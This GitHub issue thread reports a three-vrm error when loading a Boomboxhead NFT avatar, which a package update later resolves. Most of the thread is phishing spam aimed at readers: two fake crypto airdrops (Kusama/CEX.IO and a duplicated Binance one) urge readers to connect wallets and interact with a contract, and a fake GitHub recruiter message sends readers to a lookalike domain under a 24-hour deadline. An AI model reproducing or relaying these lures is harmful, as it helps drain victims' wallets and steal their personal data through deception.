### ISSUE TITLE
VRM loading doesn't work for Boomboxhead NFT

### ISSUE THREAD

**Issue by zoan37** [zoan37/agentcube#1]
NFT: https://opensea.io/assets/ethereum/0xb67ff46dfde55ad2fe05881433e5687fd1000312/99
VRM: ipfs://bafybeigt556wa5s562z6glcjzmqza77yux7fb4z674f4nuzyyap2iopavm/36.vrm

I'm using @pixiv/three-vrm (https://github.com/pixiv/three-vrm ) to load VRM with Three.js. However, loading the Boomboxhead VRM results in the following error:

```
game.js?t=1682621429299:116 RangeError: Maximum call stack size exceeded
    at String.replace (<anonymous>)
    at PropertyBinding.sanitizeNodeName (three.module.js:45062:15)
    at GLTFParser.createUniqueName (GLTFLoader.js:3335:41)
    at GLTFParser.loadNode (GLTFLoader.js:3889:42)
    at GLTFLoader.js:2548:34
    at GLTFParser._invokeOne (GLTFLoader.js:2497:19)
    at GLTFParser.getDependency (GLTFLoader.js:2546:24)
    at GLTFParser.loadSkin (GLTFLoader.js:3615:23)
    at GLTFParser.getDependency (GLTFLoader.js:2594:24)
    at GLTFLoader.js:3938:14
(
```
I get the same error when using drag-and-drop VRM demos: https://pixiv.github.io/three-vrm/packages/three-vrm/examples/

Loading with @0b5vr/three-vrm-inspector (https://github.com/0b5vr/three-vrm-inspector ) works though (it also uses @pixiv/three-vrm). So need to investigate how three-vrm-inspector is able to get it working.

Edit: vrm-dance-viewer also works: https://github.com/JLChnToZ/vrm-dance-viewer

**Comment by zoan37** [comment]
Update: using Boomboxhead NFT with @pixiv/three-vrm demo now works, looks like a new change to the package fixed it

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @mildronize, @cryptosunshine, @neg4n, @linchengzzz, @uu-z, @ArmmGh, @coocla, @018c5571c587a48f50c, @itomoyasu, @alagunoff, @drj3ky11, @stvndf, @landock, @Violet-Bora-Lee, @q20274982, @Helkem0, @pseudobun, @arnaudmanaranche, @pradel, @ogous, @vikiival, @jaybuidl, @regohiro, @tipii, @sakulstra, @fanyilun0, @dongnaebi, @0xseven7, @Mr-ONADASKY, @Keeeeeeeks, @yougotwill, @mathieu-bour, @LucidSamuel, @alvrs, @scobru, @Tomiblanchard, @akasuv, @pom421, @wniter, @jacobvanschenck, @ZeroEkkusu, @ocrybit, @pfletcherhill

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by SourceAura** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
tuxcanfly, @LukasHedegaard, @donyeveworld, @evantancy, @medjamac, @CharmCityCapital, @superplussed, @jackeldestripat, @testpower4, @lan956, @zipaJopa, @lap-sys, @Juanjoarlandis, @KalinNaidoo, @robbie-hunt, @SteveCohen, @69relyT, @bimvercrypto, @Snellparlings, @amlcodes
